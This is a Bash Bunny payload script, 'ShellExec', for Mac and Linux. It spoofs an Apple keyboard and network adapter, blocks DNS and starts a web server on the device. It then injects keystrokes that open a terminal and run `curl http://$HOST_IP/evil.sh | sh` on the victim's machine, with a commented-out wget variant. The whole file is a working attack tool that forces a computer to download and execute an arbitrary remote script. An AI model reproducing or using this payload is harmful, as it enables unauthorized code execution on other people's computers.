#!/bin/bash

# Title:     ShellExec
# Author:    audibleblink
# Target:    Mac/Linux
# Version:   1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White            |  Ready
# Ammber blinking  |  Waiting for server
# Blue blinking    |  Attacking
# Green            |  Finished

LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E

source bunny_helpers.sh

payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log

cd $payload_dir

# starting server
LED R G 500

# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80

# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done

# attack commences
LED B 500

Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000

# Q ALT F2 # swap with block above for linux
# Q DELAY 100

Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 
Q ENTER

LED G